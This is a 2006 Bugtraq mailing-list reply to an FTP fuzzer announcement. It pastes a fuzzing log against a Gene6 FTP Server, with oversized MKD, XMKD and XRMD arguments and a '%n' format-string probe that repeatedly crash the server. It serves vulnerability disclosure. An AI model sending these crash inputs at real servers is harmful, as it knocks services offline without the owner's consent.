Re: FTP Fuzzer

To: infocus <infocus@xxxxxxxxx>
Subject: Re: FTP Fuzzer
From: Alexey Biznya <biakus@xxxxxx>
Date: Wed, 03 May 2006 17:41:08 +0800
Cc: bugtraq@xxxxxxxxxxxxxxxxx
In-reply-to: <02bd01c5e7e2$af542680$18718353@HPlaptop>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: KRW
References: <02bd01c5e7e2$af542680$18718353@HPlaptop>

infocus wrote:

Hi,

We have released simple and user friendly GUI FTP fuzzer tool for stress
testing FTP server implementations. It is quite configurable tool, which
means that you can precisely define which FTP commands will be fuzzed
with the parameter size and test strings.

Running this fuzzer against FTP server implementations resulted in

uncovering numerous security vulnerabilities (overflows, format strings)in various FTP servers. After short period of fuzzing, fuzzer revealedbuffer overflow vulnerabilities in for example:


- ArgoSoft FTP Server (RNTO Unicode overflow)
- Golden FTP Server (NLST overflow)
- FileZilla FTP Server (MLSD)
- FileZilla remote server interface (homemade protocol)
- WarFTPD (various exceptions and WDM.exe overflow)

You can download it from:
http://www.infigo.hr/files/ftpfuzz.zip


220 Gene6 FTP Server v3.1.0  (Build 70) ready...

[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [~A/~A/~A/~A/~A/~A/~A]    SIZE: 3000 ]
[ Connecting to x.x.x.x:21... ]

[ ERROR: Cannot connect to target!!! ][ SERVER IS MAYBE DEADBECAUSE OF FUZZING!!! ]


[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [~/~/~/~/~/~/~/~/~/~/]    SIZE: 6300 ]
[ Connecting to x.x.x.x:21... ]

[ ERROR: Cannot connect to target!!! ][ SERVER IS MAYBE DEADBECAUSE OF FUZZING!!! ]


[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [,~/,~/,~/,~/,~/,~/,~]    SIZE: 6300 ]
[ Connecting to x.x.x.x:21... ]
[ Connected, starting fuzz process... ]
[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [,~/,~/,~/,~/,~/,~/,~]    SIZE: 7300 ]
[ Connecting to x.x.x.x:21... ]

[ ERROR: Cannot connect to target!!! ][ SERVER IS MAYBE DEADBECAUSE OF FUZZING!!! ]


[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [/A~%n/A~%n/A~%n/A~%n]    SIZE: 7300 ]
[ Connecting to x.x.x.x:21... ]

[ ERROR: Cannot connect to target!!! ][ SERVER IS MAYBE DEADBECAUSE OF FUZZING!!! ]


[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [~1/~1/~1/~1/~1/~1/~1]    SIZE: 6300 ]
[ Connecting to x.x.x.x:21... ]

[ ERROR: Cannot connect to target!!! ][ SERVER IS MAYBE DEADBECAUSE OF FUZZING!!! ]


[ USER: [test] ]
331 Password required for test.

[ PASS: [test] ]
[ CMD: [RMD]    FUZZ: [






]    SIZE: 200000 ]

[ CMD: [XMKD]    FUZZ: [~A/~A/~A/~A/~A/~A/~A]    SIZE: 1400 ]

RECV: 550"~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~

[ CMD: [XMKD]    FUZZ: [~A/~A/~A/~A/~A/~A/~A]    SIZE: 2300 ]
RECV: 501 An error occured, the administrator was notified.

[ CMD: [XMKD]    FUZZ: [~A/~A/~A/~A/~A/~A/~A]    SIZE: 3000 ]
[ Connecting to x.x.x.x:21... ]

[ ERROR: Cannot connect to target!!! ][ SERVER IS MAYBE DEADBECAUSE OF FUZZING!!! ]


[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [XRMD]    FUZZ: [~A/~A/~A/~A/~A/~A/~A]    SIZE: 4700 ]
[ Connecting to x.x.x.x:21... ]

[ ERROR: Cannot connect to target!!! ][ SERVER IS MAYBE DEADBECAUSE OF FUZZING!!! ]




--

tester

References:
- FTP Fuzzer
  - From: infocus

Prev by Date: [USN-277-1] TIFF library vulnerabilities
Next by Date: Quagga RIPD unauthenticated route injection
Previous by thread: FTP Fuzzer
Next by thread: VHCS --- Virtual Hosting Control System Cross Site Scripting
Index(es):
- Date
- Thread